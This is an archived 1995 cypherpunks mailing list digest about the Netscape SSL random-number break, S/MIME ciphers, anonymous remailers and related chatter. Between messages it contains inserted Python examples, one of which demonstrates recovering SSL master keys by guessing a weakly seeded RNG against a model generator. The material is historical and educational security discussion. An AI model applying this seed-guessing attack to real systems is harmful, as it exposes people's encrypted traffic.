 -- +- Bill England, wengland at stephsf.COM -----------------------------------+
    |  *  *  H -> He +24Mev                                                    |
    |   * * *  ... Oooo, we're having so much fun making itty bitty suns  *    |
    |__ *  * __________________________________________________________________|
*/

---- ZZ: Makefile ----
#
# Makefile for asadi.
#
CC=gcc
CFLAGS=-g
LIBS=-lkrb -ldes

asadi: asadi.c rand.o
	${CC} ${CFLAGS} -o asadi asadi.c rand.o ${LIBS}

rand.o: rand.c
	$(CC) -c rand.c

From perry at piermont.com Sun Sep 17 22:27:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 17 Sep 95 22:27:10 PDT
Subject: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <199509180527.BAA28782@frankenstein.piermont.com>

Ian Goldberg writes:
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.
> See below for details.

Why is this completely unsurprising? I've said it before and I'll say it again -- Netscape's programmers (with a few notable exceptions -- you know who you are) tend to be sloppy about security critical details. Experience with most of the same people from back when they built Mosaic shows that they just don't get the details right. (I wonder how many buffer overflow security bugs lurk in Netscape waiting to be found. I wonder how many such bugs lurk in their web servers, too...)

Anyway, congratulations to you and Dave on an excellent piece of work. I say a bunch of us should buy you "I broke Netscape's security and all I got was this lousy T-Shirt" shirts, if only someone would design them! (Two of those should be given to our friends in the U.K. and at INRIA who brute forced Netscape before. A dozen more of the shirts should be held for future breaks -- which are a "when", not an "if".)

> I've included the header to a program we wrote to do this key-cracking
> below. I would like to get some information, though:
>
> o Where should I put the full source (1 file, ~12k) so that ITAR lovers
> don't get mad at me?
Give it to the folks at ftp.csua.berkeley.edu, I say.

> o Where can I find a version of netscape that does RC4-128? It is
> likely that it suffers from the same problem, and even a brute-force
> search of the entire seed space is _much_ less than 128 bits.

They sell it in stores.

Perry

From klp at gold.tc.umn.edu Sun Sep 17 22:27:32 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Sun, 17 Sep 95 22:27:32 PDT
Subject: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <305d030d0527002@noc.cis.umn.edu>

A little birdie told me that Ian Goldberg said:
>
> As some of you may recall, a few weeks ago I posted a
> reverse-compilation of the random number generation routine used by
> netscape to choose challenge data and encryption keys.
>
> Recently, one of my officemates (David Wagner )
> and I (Ian Goldberg ) finished the job
> of seeing exactly how the encryption keys are picked.
>
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.

Makes one wonder what the seed is on a Windows implementation... If it's only the time, you can probably approximate what the clock is set to within a couple of minutes (if the timezone of the client is known).

--
Kevin Prigge                     | Holes in whats left of my reason,
CIS Consultant                   | holes in the knees of my blues,
Computer & Information Services  | odds against me been increasin'
email: klp at cis.umn.edu        | but I'll pull through...

From perry at piermont.com Sun Sep 17 22:30:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 17 Sep 95 22:30:10 PDT
Subject: Netscape SSL implementation is broken!
In-Reply-To: <199509180525.HAA06519@piraya.electrum.kth.se>
Message-ID: <199509180529.BAA28806@frankenstein.piermont.com>

Christian Wettergren writes:
> I guess we should send them the draft-ietf-security-randomness-00.txt
> asap.

I thought that was an RFC by now.

Perry

From jcaldwel at iquest.net Sun Sep 17 22:42:15 1995
From: jcaldwel at iquest.net (James Caldwell)
Date: Sun, 17 Sep 95 22:42:15 PDT
Subject: Netscape SSL implementation cracked!
In-Reply-To: <305d030d0527002@noc.cis.umn.edu>
Message-ID:

Kevin L Prigge wrote:
A little birdie told me that Ian Goldberg said:
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.
/ Makes one wonder what the seed is on a Windows implementation...
/ If it's only the time, you can probably approximate what the
/ clock is set to within a couple of minutes (if the timezone of the
/ client is known).

Hah! Like a Cmos clock can *ever* keep a consistent time for more than two minutes...

From jis at mit.edu Sun Sep 17 23:34:08 1995
From: jis at mit.edu (Jeffrey I. Schiller)
Date: Sun, 17 Sep 95 23:34:08 PDT
Subject: Netscape SSL implementation cracked!
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Makes one wonder what the seed is on a Windows implementation...
>If it's only the time, you can probably approximate what the
>clock is set to within a couple of minutes (if the timezone of the
>client is known).

Who cares what the timezone of the client is. Try searching around in all 24 timezones. The trick with predicting a random number generator isn't that you have to get the exact key, you just have to narrow the search space to something reasonable. A couple of minutes times 24 isn't that bad!
-Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF0SvMUtR20Nv5BtAQEAVQP/ccPp8IM8dnGtdDTajjO1a0sYBo7u7LcB
yracUhWnE6h90DEtEbGHpEUz3UpvMrXVTC1cFYXml8v3zH4DKlgXyIwC1kItAbqB
9NJTtvB1D5Msnoslqkn+ZoP2K8i0ajcHcXlqma32YiQJM6D4KSxFtRgM7vawCVuy
KqnbrdSrQQQ=
=bYf5
-----END PGP SIGNATURE-----

From danjw at earthlink.net Mon Sep 18 00:27:34 1995
From: danjw at earthlink.net (Dan Weinstein)
Date: Mon, 18 Sep 95 00:27:34 PDT
Subject: Netscape Navigator 2.0 will implement secure e-mail
Message-ID: <199509180727.AAA23196@atlas.earthlink.net>

I just got off of Netscapes home page and they have announced Netscape Navigator 2.0. It will include full e-mail functionality with S/MIME implemented. Does anybody know anything about the S/MIME Protocol? How secure is it?

Dan Weinstein
danjw at earthlink.net
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.

"I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No.
Friedrich Nietzsche

From jsw at neon.netscape.com Mon Sep 18 01:35:16 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 01:35:16 PDT
Subject: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <199509180727.AAA23196@atlas.earthlink.net>
Message-ID: <43jau5$qbj@tera.mcom.com>

In article <199509180727.AAA23196 at atlas.earthlink.net>, danjw at earthlink.net (Dan Weinstein) writes:
> I just got off of Netscapes home page and they have announced Netscape
> Navigator 2.0. It will include full e-mail functionality with S/MIME
> implemented. Does anybody know anything about the S/MIME Protocol?
> How secure is it?

You can find some documents about s/mime on RSA's web site:

http://www.rsa.com/ftpdir/pub/S-MIME/

S/MIME is basically a mime body enveloped in a PKCS7 message.
You can find out more about PKCS from:

http://www.rsa.com/ftpdir/pub/pkcs

The implementation guide recommends using rc2-cbc 40-bit for content encryption when there is no way to determine the capabilities of the recipient. When you do know what the recipient can do, it recommends using RC2-CBC with a longer key or DES-CBC.

For key encryption support for RSA with key sizes of 512 to 1024 is required, and support for 2048 bit keys is recommended. A minimum key size of 768 bits is recommended for US users.

> Dan Weinstein

Hi Dan. Yes, we are related. :-)

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From eay at mincom.oz.au Mon Sep 18 02:11:20 1995
From: eay at mincom.oz.au (Eric Young)
Date: Mon, 18 Sep 95 02:11:20 PDT
Subject: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID:

On 18 Sep 1995, Jeff Weinstein wrote:
> The implementation guide recommends using rc2-cbc 40-bit for content
> encryption when there is no way to determine the capabilities of the
> recipient. When you do know what the recipient can do, it recommends
> using RC2-CBC with a longer key or DES-CBC.

Hmm.... notice the use of a non public cipher as the base cipher.... what a shame....

A note for non-USA people, the next version of SSLeay will include the full functionality of RSAref/RSAeuro and I should soon have the PKCS-7 stuff finished in the next release after that. I've almost finished the documentation of the encryption/RSA type routines. The encryption/open/seal routines supporting any cipher that conforms with a specified Cipher API. It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128.
If people could send me the official Object identifiers for these ciphers, I'll be able to support them in PKCS-7, otherwise they will only be supported in PEM mode. eg, rc4 is '1 2 840 113549 3 4' but I don't even know what des in cbc mode is. I lack documentation. If any-one can email SMIME/PKCS-7 stuff that is encrypted/sealed, I'll be able to extract the object identifiers.

> For key encryption support for RSA with key sizes of 512 to 1024 is
> required, and support for 2048 bit keys is recommended. A minimum
> key size of 768 bits is recommended for US users.

Again, SSLeay has no restrictions, 4096 bits anyone :-)

eric (who is just lacking documentation :-(
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au | more followups than the message contents :-)

From carolann at censored.org Mon Sep 18 02:29:53 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Mon, 18 Sep 95 02:29:53 PDT
Subject: Jill Sixpack wants to know?
Message-ID: <199509180929.CAA12683@usr1.primenet.com>

Is the cracking of Netscape SSL the equivalent of lockpicking, as opposed to the keycracking stuff we did (making a key). And further, we can do it rather fast, like in minutes?

I just want to make sure I explain it to Jill Sixpack correctly.

OK! KEWLNESS!
Love Always,

Carol Anne
--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+NS&
http://dcs.ex.ac.uk/~aba/export/

From jsw at neon.netscape.com Mon Sep 18 03:41:42 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 03:41:42 PDT
Subject: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID: <43jibb$5ok@tera.mcom.com>

In article , eay at mincom.oz.au (Eric Young) writes:
> Hmm.... notice the use of a non public cipher as the base cipher....
> what a shame....

The only reason for this is US export laws.

> It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2,
> des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128. If people could send
> me the official Object identifiers for these ciphers, I'll be able to
> support them in PKCS-7, otherwise they will only be supported in PEM mode.

Here are the ones I have:

DES-ECB OBJECT IDENTIFIER ::= { algorithm 6 }
DES-CBC OBJECT IDENTIFIER ::= { algorithm 7 }
DES-OFB OBJECT IDENTIFIER ::= { algorithm 8 }
DES-CFB OBJECT IDENTIFIER ::= { algorithm 9 }
DES-MAC OBJECT IDENTIFIER ::= { algorithm 10 }
DES-EDE OBJECT IDENTIFIER ::= { algorithm 17 }

where

algorithm OBJECT IDENTIFIER ::= {iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)}

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
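A worked model of the seed-guessing attack Ian Goldberg and David Wagner describe earlier in this digest, added here as an example. It is not their unssl.c and not Netscape's code: it keeps only the structure they report (an RNG seeded from the time in seconds and microseconds, the pid and the ppid; a 16-byte challenge sent in the clear followed by a 16-byte master key; no reseeding for later connections) and substitutes its own mixing and output functions (MD5 over the packed seed values, then an MD5 hash chain) for whatever Netscape actually did. The pid, ppid and clock values are constructed for the demonstration.

```python
import hashlib
import struct

# Added example modelling the attack Goldberg and Wagner describe.  Not
# unssl.c and not Netscape's code: the mixing function (MD5 over the packed
# seed) and the output function (MD5 hash chain) are assumptions made for
# this demonstration.


class WeakRng:
    """RNG whose entire state is a function of four guessable values."""

    def __init__(self, sec, usec, pid, ppid):
        # Assumed mixing function.  The point is not *how* the values are
        # mixed but that nothing else goes in: sec, pid and ppid are
        # observable, so only usec (under 2**20 values) is really secret.
        self.state = hashlib.md5(struct.pack(">IIII", sec, usec, pid, ppid)).digest()

    def next16(self):
        # Assumed output function: hash-chain the state and emit it.
        self.state = hashlib.md5(self.state).digest()
        return self.state


def browser_handshake(rng):
    """Client side of one SSL handshake in this model.  The 16-byte
    challenge goes out on the wire in the clear; the master key does not."""
    challenge = rng.next16()
    master_key = rng.next16()
    return challenge, master_key


def recover_first_key(sec_guess, sec_window, pid, ppid, challenge,
                      usec_limit=1_000_000):
    """Attacker: knows pid and ppid, knows the clock to within +/-
    sec_window seconds and saw the challenge on the wire.  Tries the
    guessed second first, then its neighbours, brute-forcing the
    microseconds.  Returns (sec, usec, master_key, rng, tried) or None."""
    secs = [sec_guess]
    for d in range(1, sec_window + 1):
        secs += [sec_guess - d, sec_guess + d]
    tried = 0
    for sec in secs:
        for usec in range(usec_limit):
            tried += 1
            rng = WeakRng(sec, usec, pid, ppid)
            if rng.next16() == challenge:
                # The attacker now holds the same RNG state as the browser.
                return sec, usec, rng.next16(), rng, tried
    return None


def recover_later_key(rng, later_challenge, max_outputs=1024):
    """Attacker: the browser never reseeds, so clock the recovered RNG
    until its output equals a later connection's challenge; the 16 bytes
    after that are that connection's master key, whatever host it was to."""
    for _ in range(max_outputs):
        if rng.next16() == later_challenge:
            return rng.next16()
    return None


def demo():
    # Constructed victim parameters (not real measurements).
    sec, usec, pid, ppid = 811_296_000, 137_421, 4121, 4118
    browser = WeakRng(sec, usec, pid, ppid)
    chal1, key1 = browser_handshake(browser)   # first https: connection
    chal2, key2 = browser_handshake(browser)   # later connection, other host

    # Attacker sniffed chal1 and chal2, read pid/ppid from `ps` on the
    # shared host, and got the time from the daytime service to the second.
    found = recover_first_key(sec, 1, pid, ppid, chal1)
    if found is None:
        return None
    _, found_usec, found_key1, attacker_rng, tried = found
    found_key2 = recover_later_key(attacker_rng, chal2)
    return {
        "usec": found_usec,
        "candidates_tried": tried,
        "key1_recovered": found_key1 == key1,
        "key2_recovered": found_key2 == key2,
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() recovers both master keys after about 137,000 candidate seeds, far fewer than the 2**40 a brute-force search of the RC4-40 key would need; widening sec_window, or guessing the ppid from the pid, adds linear cost rather than bits of security.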
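An added example (not SSLeay's or Netscape's code) that turns the arcs Jeff lists above, and the rc4 identifier Eric quotes, into the DER bytes PKCS-7 actually carries. It follows the X.690 encoding rules: the first two arcs fold into 40*a+b, every sub-identifier is written base-128 with the high bit set on all but its last byte, and the result gets tag 06 and a length. The des-CBC AlgorithmIdentifier helper assumes the PKCS-7 convention of carrying the 8-byte IV as an OCTET STRING parameter; the IV bytes in the test are constructed.

```python
# Added example, not SSLeay or Netscape code: DER (X.690) encoding and
# decoding of the OBJECT IDENTIFIERs exchanged in this thread.

OIW_ALGORITHM = "1.3.14.3.2"   # iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)

OIDS = {
    "DES-ECB": OIW_ALGORITHM + ".6",
    "DES-CBC": OIW_ALGORITHM + ".7",
    "DES-OFB": OIW_ALGORITHM + ".8",
    "DES-CFB": OIW_ALGORITHM + ".9",
    "DES-MAC": OIW_ALGORITHM + ".10",
    "DES-EDE": OIW_ALGORITHM + ".17",
    "RC4": "1.2.840.113549.3.4",          # the value Eric quotes
}


def _base128(n):
    """Big-endian base-128, continuation bit set on all but the last byte."""
    out = [n & 0x7F]
    n >>= 7
    while n:
        out.append(0x80 | (n & 0x7F))
        n >>= 7
    return bytes(reversed(out))


def _der_length(n):
    """DER length: short form below 128, else 0x80|k followed by k bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _der_length(len(body)) + body


def encode_oid(dotted):
    """Dotted string -> complete DER TLV (tag 0x06)."""
    arcs = [int(a) for a in dotted.split(".")]
    if len(arcs) < 2 or min(arcs) < 0 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("not a valid OID: " + dotted)
    body = _base128(arcs[0] * 40 + arcs[1])
    for arc in arcs[2:]:
        body += _base128(arc)
    return _tlv(0x06, body)


def _read_length(buf, pos):
    first = buf[pos]
    pos += 1
    if first < 0x80:
        return first, pos
    nbytes = first & 0x7F
    if nbytes == 0 or nbytes > 4 or pos + nbytes > len(buf):
        raise ValueError("bad DER length")
    return int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes


def decode_oid(der):
    """DER TLV -> dotted string.  Rejects a wrong tag, a truncated body and
    an unterminated last sub-identifier (a classic parser oversight)."""
    if not der or der[0] != 0x06:
        raise ValueError("not an OBJECT IDENTIFIER")
    length, pos = _read_length(der, 1)
    body = der[pos:pos + length]
    if len(body) != length or not body or body[-1] & 0x80:
        raise ValueError("truncated OID")
    subids, n = [], 0
    for b in body:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            subids.append(n)
            n = 0
    first = subids[0]
    arcs = [2, first - 80] if first >= 80 else [first // 40, first % 40]
    return ".".join(str(a) for a in arcs + subids[1:])


def des_cbc_algorithm_identifier(iv):
    """AlgorithmIdentifier ::= SEQUENCE { desCBC OID, IV OCTET STRING (8) }
    -- the PKCS-7 convention for CBC parameters, assumed here."""
    if len(iv) != 8:
        raise ValueError("DES-CBC IV must be 8 bytes")
    return _tlv(0x30, encode_oid(OIDS["DES-CBC"]) + _tlv(0x04, bytes(iv)))


if __name__ == "__main__":
    for name, oid in OIDS.items():
        print(f"{name:8} {oid:22} {encode_oid(oid).hex()}")
```

The des-CBC identifier Eric was missing encodes to 06 05 2b 0e 03 02 07; the rc4 one he already had encodes to 06 08 2a 86 48 86 f7 0d 03 04, the 2a 86 48 86 f7 0d prefix being the RSADSI arc that every PKCS identifier starts with.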
From rah at shipwright.com Mon Sep 18 04:31:19 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 04:31:19 PDT
Subject: e$: New Ecash Shop
Message-ID:

Now, this looks interesting...

Cheers,
Bob Hettinga

--- begin forwarded text

From: kulz at dragon.klte.hu (Kultsar Zoltan)
Subject: New Ecash Shop
To: rah at shipwright.com
Date: Mon, 18 Sep 1995 12:30:19 +0200 (MET DST)
MIME-Version: 1.0

I have opened a new unofficial shop, that accepts ecash. It's unofficial, because it has not yet a logo. It is an autoresponder, which automatically sends out documents that people request. Uploading costs 5 USD or 15 cb$s (minimum charges). Your documents will also be available on www, or you can build your homepage if you wish, but I can provide only slow links yet.

I bought the original autoresponder for ecash, but in its original form it wasn't secure. Eg. 'send *' type requests sent out private material. Now it's completely secure.

Send mail To: kulz at dragon.klte.hu Subject: send faxbank

There is also a www page at http://dragon.klte.hu/~kulz/faxbank.html, where you can view the documents online.

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From danisch at ira.uka.de Mon Sep 18 06:01:10 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Mon, 18 Sep 95 06:01:10 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509181245.AA02101@elysion.iaks.ira.uka.de>

> Bad idea, it would simply mean that every kook on USEnet would add
> alt.cypherpunks onto the crossposting line. We would have black helicopters, gun
> loons, Waco Wako's, Loonytarians and turkish government propaganda spamming
> forever.

And cancel-messages from Co$ ...
Hadmut

From raph at CS.Berkeley.EDU Mon Sep 18 06:50:41 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 18 Sep 95 06:50:41 PDT Subject: List of reliable remailers Message-ID: <199509181350.GAA01202@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = " cpunk";
$remailer{"precip"} = " cpunk mix pgp hash latent cut ek reord";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is live! It should be more accurate, reliable, and faster than before. Penet is back up! Enjoy.
remailer  email address                        history        latency   uptime
-----------------------------------------------------------------------
ford      remailer at bi-node.zerberus.de     -**-**++*--*    1:29:00  100.00%
crown     mixmaster at kether.alias.net       -----++--+++      51:47   99.99%
syrinx    syrinx at c2.org                    +++-+++-++++      41:46   99.99%
hroller   hroller at c2.org                   ******+#####       1:06   99.99%
precip    mixmaster at mix.precipice.com      +-++-+.--       6:12:30   99.98%
bsu-cs    nowhere at bsu-cs.bsu.edu           ++*+--_**#+#      16:52   99.98%
robo      robo at c2.org                      ******+##*##       1:07   99.97%
spook     remailer at spook.alias.net         -----------     2:16:14   99.95%
alumni    hal at alumni.caltech.edu           *** **+*+###       3:07   99.93%
portal    hfinney at shell.portal.com         +* *** #+###       3:08   99.81%
hacktic   remailer at utopia.hacktic.nl       ****** ++***      10:42   99.68%
rmadillo  remailer at armadillo.com           ++++++++++ +      39:26   99.57%
replay    remailer at replay.com              ***** ++***        7:28   99.55%
flame     remailer at flame.alias.net         +*+++ ++***       27:46   99.42%
vishnu    mixmaster at vishnu.alias.net       --+*- +++-+     1:36:19   99.29%
mix       mixmaster at remail.obscura.com     ___.+--._. -   12:46:51   98.98%
ideath    remailer at ideath.goldenbear.com   -----.----+     5:04:07   98.43%
extropia  remail at extropia.wimsey.com       -.---.-----     5:56:37   97.65%
c2        remail at c2.org                    ++++** *+ *       27:40   96.11%
penet                                        * ++            4:40:10   95.85%
rahul     homer at rahul.net                  ******+*#+##       2:18   99.99%
ncognito  ncognito at gate.net                **+*+*-++          6:59   68.25%
gondolin  mixmaster at gondolin.org           ---.--*--       3:11:17   67.07%

History key
    # response in less than 5 minutes.
    * response in less than 1 hour.
    + response in less than 4 hours.
    - response in less than 24 hours.
    . response in more than 1 day.
    _ response came back too late (more than 2 days).

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP.
         A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.
mix      Can accept messages in Mixmaster format.
reord    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon      Remailer has been known to monitor contents of private email.
filter   Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From steven at echonyc.com Mon Sep 18 06:56:53 1995 From: steven at echonyc.com (Steven Levy) Date: Mon, 18 Sep 95 06:56:53 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: No chance. The problem for me isn't that someone wanted to call a movie Hackers but that it causes confusion in that for eleven years there has been a preexisting work by that name. There is a novelization of the screenplay now in paperback, so if a friend recommends that you buy Hackers, you'll probably buy that one. (especially since Dell is determined to do as little as possible for my own book). On Sun, 17 Sep 1995, Steve Bryan wrote: > At 8:36 pm 9/16/95, Steven Levy wrote: > > >>I saw "Hackers" yesterday. It's not bad and its political sensibility is > >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> > > >It may not be a crime, but it's not nice to steal a title. > > I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appearance of the author of the identically named book? > > > From trei at process.com Mon Sep 18 07:12:45 1995 From: trei at process.com (Peter Trei) Date: Mon, 18 Sep 95 07:12:45 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509181412.AA15673@toad.com> > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > It may not be a crime, but it's not nice to steal a title. You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? I saw this (in an Off-Off-Broadway production), years before your book came out. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From frissell at panix.com Mon Sep 18 07:21:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:21:55 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509181421.KAA01808@panix.com> At 08:33 AM 9/15/95 -0700, Charles Lewton wrote: >Not quite squashed, Duncan. Bullet placement (poor by some standards) >is all that prevented Mr. Weaver from croaking like his unfortunate wife. >She is said to have "pissed off" the feds but was not charged with a >single actionable item yet she remains quite dead. > >Unless I have missed something somewhere, no TLA is concerned in the slightest >with individual liberty. That notion should keep a rational person awake >nights. > >Chuck > In response to Chuck and Lucky, I can only say that the Weavers suffered 57% casualties (4/7) and 28% KIA (2/7). The Feds suffered .25% KIA (1/400). I don't think any Feds were merely wounded. They brought murder charges against two members of the group and lost.
They settled wrongful death suits for $3.1 million. They also lost the publicity war. They had to change their procedures because of Ruby Ridge and Waco. They energized the opposition. The casualties were unfortunate but when facing force ratios of 57/1 or better, the outcome has to be considered a major victory for Randy Weaver. The case is a demonstration of modern conflicts in which litigation and publicity count as much as guns. On that field, the Feds don't hold all the cards. DCF "The libertarian and conservative coalition of the 'Right' is a low-maintenance coalition because its members mostly want to be left alone while the special interest group coalition of the 'Left' is a high-maintenance coalition because all of its members need to be given a vast dose of government cash daily." From frissell at panix.com Mon Sep 18 07:23:07 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:23:07 PDT Subject: Anonymous WWW proxy Alpha release available Message-ID: <199509181421.KAA01875@panix.com> Thanks. What we now need is a proxy located in the US with good connections for performance. Does anyone know a good test page that reads back the info your browser is putting out so you can test proxies? DCF From frissell at panix.com Mon Sep 18 07:27:17 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 18 Sep 95 07:27:17 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <199509181426.KAA03412@panix.com> At 10:16 AM 9/18/95 -6, Peter Trei wrote: >> It may not be a crime, but it's not nice to steal a title. > >You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? >I saw this (in an Off-Off-Broadway production), years before your book came >out. Steven knows titles can't be copyrighted. He was just expressing the wish that they had come up with their own title. I'm pissed because the sequel to Jurassic Park is stealing the title of Sir Arthur Conan Doyle's dinosaur novel "Lost World." 
Unfortunately, title-space is more limited than book-space. DCF From anonymous at robo.remailer Mon Sep 18 07:30:57 1995 From: anonymous at robo.remailer (anonymous at robo.remailer) Date: Mon, 18 Sep 95 07:30:57 PDT Subject: Code of Law Message-ID: <199509181425.HAA13003@infinity.c2.org> Financial Times, Sept 18, 1995. Code to deny the money launderer The International Bar Association will this week call for the establishment of a code of practice for lawyers worldwide to deny criminals access to legal services which facilitate money laundering. At the IBA's business law conference in Paris, which opens today, Professor Ross Harper, IBA president, will ask representatives from 167 bar associations to pass a motion supporting efforts to counter money laundering and for the creation of common professional standards on the issue. "We are anxious that there be no safe havens for the ill-gotten proceeds of criminal activities throughout the world," he said yesterday. Estimates put the amount of money laundered worldwide each year at more than 500 billion pounds. On such a scale it is possible for economies, world trade and global banking to be subverted by organised crime, the IBA says. The motion urges member bar associations to press their national governments to adopt the principal recommendations of the Financial Action Task Force on money laundering set up in 1989 by the Group of Seven industrialised countries and the European Commission. Robert Rice, London ----- Newsweek, Sept 